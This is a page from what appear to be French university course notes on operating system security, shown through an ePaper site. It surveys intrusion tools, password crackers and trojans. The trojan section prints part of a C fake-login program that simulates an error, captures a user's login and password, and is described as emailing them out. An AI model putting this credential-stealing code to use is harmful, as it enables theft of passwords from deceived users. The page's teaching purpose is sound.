12.07.2015 Views

Généralités sur les systèmes d'exploitation - Site personnel de ...

Généralités sur les systèmes d'exploitation - Site personnel de ...

Généralités sur les systèmes d'exploitation - Site personnel de ...

SHOW MORE
SHOW LESS
  • No tags were found...

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

LO14 : Université Technologique <strong>de</strong> Troyes• Satan : (Security Administrator's Tool for Analysibng Networks) a la particularité d'avoir été écrit enPERL• Hunt (Pavel Krautz) c'est un programme permettant <strong>de</strong> s'introduire dans une connexion, <strong>de</strong> la <strong>sur</strong>veilleret d'en prendre le contrôle. On peut télécharger Hunt 1.3 pour GNU LINUX <strong>sur</strong> le sitehttp://www.cri.cz/kra/in<strong>de</strong>x.html Il permet <strong>de</strong> s'attaquer aux réseaux considérés jusque là imprenab<strong>les</strong>,<strong>les</strong> réseaux switchés.• Host : c'est une comman<strong>de</strong> UNIX classée parmi <strong>les</strong> dix comman<strong>de</strong>s <strong>les</strong> plus dangereuses et menaçantesd'UNIX• rusers et finger : comman<strong>de</strong>s UNIX ainsi que showmount.2°) Outils pour forcer <strong>les</strong> mots <strong>de</strong> passeLe codage <strong>de</strong>s mots <strong>de</strong> passe n'est pas inversible => <strong>de</strong>s outils <strong>de</strong> simulation utilisent l'algorithme publicayant servi au chiffrement et on compare le résultat.Force brute : on génère <strong>les</strong> mots <strong>de</strong> passe avec un algorithme, on crypte et on compareForce intelligente : on essaie comme mot <strong>de</strong> passe <strong>les</strong> noms d'utilisateurs, puis <strong>les</strong> prénoms.... Il existe <strong>de</strong>sdictionnaires <strong>de</strong> prénoms qui permettent <strong>de</strong> forcer une bonne partie <strong>de</strong>s mots <strong>de</strong> passe.D'où <strong>les</strong> mises en gar<strong>de</strong> <strong>sur</strong> l'importance du choix d'un bon mot <strong>de</strong> passe : qui alterne lettres et chiffres...Crack écrit par Alec D. E. Muffet, ingénieur logiciel spécialiste UNIX. Est distribué librement. Il est conçupour trouver <strong>les</strong> mots <strong>de</strong> passe standards <strong>de</strong> 8 caractères cryptés avec DES.CrackerJack pour la plate-forme DOS.PaceCrack95 tourne sous 95 dans une fenêtre console.Qcrack pour LINUX puis porté sous DOSJohn the Ripper sous DOSPcrack (Perl Crack)3°) Chevaux <strong>de</strong> Troie (Trojan ou trojan horse)Il s'agit d'un programme ou co<strong>de</strong> non autorisé placé dans un programme sain. Ce co<strong>de</strong> intrus exécute <strong>de</strong>sfonctions indésirab<strong>les</strong>.L'exemple le plus caractéristique est un programme qui simule une erreur "Segmentation fault" et lance unfaux login, ce qui permet <strong>de</strong> récupérer un mot <strong>de</strong> passe et l'envoie par e-mail :http://www.hoobie.net/security/exploits/hacking/intru<strong>de</strong>rf.cvoid fakelogin(){char *input1[10]={0};char input[10];char var[80] = {0};char buffer[80] = {0};FILE *fp;FILE *file;char hostname[80]={0};FILE *hostnamefile;fp = popen("cat /etc/issue.net", "r");fread(var, 80, 1, fp);printf("\n");printf("%s",var);printf("\n");hostnamefile=fopen("/etc/HOSTNAME","r");fread(hostname,78,1,hostnamefile);scanend(hostname);printf("%s login: ",hostname);gets(input);*input1=getpass("Password: ");printf("\n");printf("/bin/cat cannot open /etc/motd cought buffer overi<strong>de</strong>!\n");printf("opening system fix shell, run fsck\n");94 /98 S. Moutou : Cours

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!